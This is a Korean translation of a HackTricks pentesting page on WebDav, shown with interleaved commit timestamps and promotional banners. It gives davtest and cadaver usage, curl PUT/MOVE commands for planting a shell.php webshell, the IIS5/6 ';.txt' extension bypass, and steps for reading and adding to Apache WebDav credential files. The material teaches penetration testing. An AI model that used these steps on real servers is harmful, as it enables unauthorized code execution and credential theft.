2022-05-01 13:25:53 +00:00
# WebDav
2022-04-28 16:01:33 +00:00
2024-05-05 22:46:17 +00:00
< figure > < img src = "../../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-09-01 23:40:55 +00:00
\
2024-05-05 22:46:17 +00:00
[**Trickest** ](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks )를 사용하여 세계에서 가장 **고급 커뮤니티 도구**로 구동되는 **워크플로우를 쉽게 구축**하고 **자동화**하세요.\
오늘 바로 액세스하세요:
2022-09-01 23:40:55 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2024-03-17 16:41:54 +00:00
< summary > < strong > 제로부터 영웅이 될 때까지 AWS 해킹을 배우세요< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 21:30:13 +00:00
HackTricks를 지원하는 다른 방법:
2023-12-31 01:24:39 +00:00
2024-05-05 22:46:17 +00:00
* **회사가 HackTricks에 광고되길 원하거나** **PDF로 HackTricks 다운로드**하려면 [**구독 요금제** ](https://github.com/sponsors/carlospolop)를 확인하세요!
2024-03-17 16:41:54 +00:00
* [**공식 PEASS & HackTricks 스왜그** ](https://peass.creator-spring.com )를 얻으세요
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )를 발견하세요, 당사의 독점 [**NFTs** ](https://opensea.io/collection/the-peass-family ) 컬렉션
2024-05-05 22:46:17 +00:00
* **💬 [**Discord 그룹** ](https://discord.gg/hRep4RUj7f ) 또는 [**텔레그램 그룹** ](https://t.me/peass )에 **가입**하거나 **트위터** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live )**를 팔로우**하세요.
* **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
2022-04-28 16:01:33 +00:00
< / details >
2024-05-05 22:46:17 +00:00
**HTTP 서버에 WebDav가 활성화**된 경우, 일반적으로 **HTTP 기본 인증**을 통해 확인되는 **올바른 자격 증명**이 있다면 **파일을 조작**할 수 있습니다. 이러한 서버를 제어하는 것은 종종 **웹쉘을 업로드하고 실행**하는 것을 포함합니다.
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
WebDav 서버에 액세스하려면 일반적으로 **유효한 자격 증명**이 필요하며, [**WebDav 브루트포스** ](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth)가 그것을 얻는 데 일반적인 방법입니다.
2020-07-15 15:43:14 +00:00
2024-03-29 21:25:26 +00:00
파일 업로드에 대한 제한을 극복하기 위해 특히 서버 측 스크립트 실행을 방지하는 경우 다음을 수행할 수 있습니다:
2020-07-15 15:43:14 +00:00
2024-03-17 16:41:54 +00:00
* **실행 가능한 확장자**를 가진 파일을 직접 **업로드**합니다(제한이 없는 경우).
2024-05-05 22:46:17 +00:00
* 업로드된 비실행 파일(.txt와 같은)을 실행 가능한 확장자로 **이름 바꿉니다** .
* 업로드된 비실행 파일을 복사하여 실행 가능한 확장자로 변경합니다.
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
## DavTest
2020-07-15 15:43:14 +00:00
2024-02-10 21:30:13 +00:00
**Davtest**는 **다양한 확장자를 가진 여러 파일을 업로드**하고 확장자가 **실행되는지 확인**합니다:
2020-07-15 15:43:14 +00:00
```bash
davtest [-auth user:password] -move -sendbd auto -url http://< IP > #Uplaod .txt files and try to move it to other extensions
davtest [-auth user:password] -sendbd auto -url http://< IP > #Try to upload every extension
```
2024-05-05 22:46:17 +00:00
```markdown
![](< .. / . . / . gitbook / assets / image ( 851 ) . png > )
이것은 ** .txt**와 ** .html 확장자가 실행되고 있는 것을 의미하는 것은 아닙니다**. 이는 단지 웹을 통해 **이 파일에 접근할 수 있다는 것**을 의미합니다.
2022-05-01 13:25:53 +00:00
## Cadaver
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
이 도구를 사용하여 **WebDav에 연결**하고 **수동으로** **업로드** , **이동** 또는 **삭제**와 같은 작업을 수행할 수 있습니다.
```
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
cadaver < IP >
```
2024-02-10 21:30:13 +00:00
## PUT 요청
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
curl -T 'shell.txt' 'http://$ip'
```
2024-02-10 21:30:13 +00:00
## MOVE 요청
```
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
```
2024-05-05 22:46:17 +00:00
< figure > < img src = "../../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-09-01 23:40:55 +00:00
\
2024-03-29 21:25:26 +00:00
[**Trickest** ](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks )를 사용하여 세계에서 가장 **고급** 커뮤니티 도구로 구동되는 **워크플로우를 쉽게 구축** 및 **자동화**하세요.\
2024-05-05 22:46:17 +00:00
오늘 바로 액세스하세요:
2022-09-01 23:40:55 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2024-02-10 21:30:13 +00:00
## IIS5/6 WebDav 취약점
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
이 취약점은 매우 흥미로운데, **WebDav**는 ** .asp** 확장자를 가진 파일을 **업로드**하거나 **이름 바꾸는 것을 허용하지 않습니다** . 그러나 이름 끝에 ** ";.txt"**를 추가하면 파일이 .asp 파일처럼 **실행**됩니다 (".txt" 대신에 ".html"을 사용할 수도 있지만 ** ";"를 잊지 마세요**).
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
그런 다음 쉘을 ".**txt" 파일**로 **업로드**하고 ** ".asp;.txt" 파일**로 **복사/이동**할 수 있습니다. 웹 서버를 통해 해당 파일에 액세스하면 **실행**됩니다 (cadaver는 이동 작업이 작동하지 않았다고 할 것이지만 실제로 작동했습니다).
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
![](< .. / . . / . gitbook / assets / image ( 1092 ) . png > )
2020-07-15 15:43:14 +00:00
2024-02-10 21:30:13 +00:00
## 자격 증명 게시
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
Webdav가 Apache 서버를 사용하는 경우 Apache에서 구성된 사이트를 살펴봐야 합니다. 일반적으로:\
2020-07-15 15:43:14 +00:00
_**/etc/apache2/sites-enabled/000-default**_
2024-02-10 21:30:13 +00:00
내부에서 다음과 같은 내용을 찾을 수 있습니다:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
ServerAdmin webmaster@localhost
2024-02-10 21:30:13 +00:00
Alias /webdav /var/www/webdav
< Directory / var / www / webdav >
DAV On
AuthType Digest
AuthName "webdav"
AuthUserFile /etc/apache2/users.password
Require valid-user
2020-07-15 15:43:14 +00:00
```
2024-05-05 22:46:17 +00:00
다음과 같이 유효한 **자격 증명**이 있는 파일이 **webdav** 서버에 있습니다:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/etc/apache2/users.password
```
2024-05-05 22:46:17 +00:00
다음은 해당 유형의 파일 내에서 **사용자 이름**과 **비밀번호** 해시를 찾을 수 있습니다. 이것들은 웹다브 서버가 사용자를 인증하는 데 사용하는 자격 증명입니다.
2020-07-15 15:43:14 +00:00
2024-05-05 22:46:17 +00:00
이를 **해독**하거나, 어떤 이유로든 **웹다브** 서버에 **액세스**하려는 경우 **더 많은** 자격 증명을 추가할 수 있습니다:
2020-07-15 15:43:14 +00:00
```bash
htpasswd /etc/apache2/users.password < USERNAME > #You will be prompted for the password
```
2024-02-10 21:30:13 +00:00
새 자격 증명이 작동하는지 확인하려면 다음을 수행할 수 있습니다:
2020-07-15 15:43:14 +00:00
```bash
wget --user < USERNAME > --ask-password http://domain/path/to/webdav/ -O - -q
```
2024-02-10 21:30:13 +00:00
## 참고 자료
2024-03-17 16:41:54 +00:00
2024-02-08 21:36:15 +00:00
* [https://vk9-sec.com/exploiting-webdav/ ](https://vk9-sec.com/exploiting-webdav/ )
2022-04-28 16:01:33 +00:00
< details >
2024-05-05 22:46:17 +00:00
< summary > < strong > htARTE (HackTricks AWS Red Team Expert)로부터 AWS 해킹을 제로부터 전문가까지 배우세요< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-10 21:30:13 +00:00
HackTricks를 지원하는 다른 방법:
2023-12-31 01:24:39 +00:00
2024-05-05 22:46:17 +00:00
* **회사가 HackTricks에 광고되길 원하거나** **PDF 형식의 HackTricks를 다운로드**하려면 [**구독 요금제** ](https://github.com/sponsors/carlospolop)를 확인하세요!
2024-03-17 16:41:54 +00:00
* [**공식 PEASS & HackTricks 스왜그** ](https://peass.creator-spring.com )를 구매하세요
2024-05-05 22:46:17 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )를 발견하세요, 당사의 독점 [**NFTs** ](https://opensea.io/collection/the-peass-family ) 컬렉션
* **💬 [**디스코드 그룹** ](https://discord.gg/hRep4RUj7f )에 가입하거나 [**텔레그램 그룹** ](https://t.me/peass )에 가입하거나** 트위터** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**를 팔로우하세요.**
* **해킹 트릭을 공유하려면** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 및 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 저장소에 PR을 제출하세요.
2022-04-28 16:01:33 +00:00
< / details >
2022-09-01 23:40:55 +00:00
2024-05-05 22:46:17 +00:00
< figure > < img src = "../../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-09-01 23:40:55 +00:00
\
2024-05-05 22:46:17 +00:00
[**Trickest** ](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks )를 사용하여 세계에서 가장 **고급** 커뮤니티 도구로 구동되는 **워크플로우를 쉽게 구축하고 자동화**하세요.\
2024-03-29 21:25:26 +00:00
오늘 바로 액세스하세요:
2022-09-01 23:40:55 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}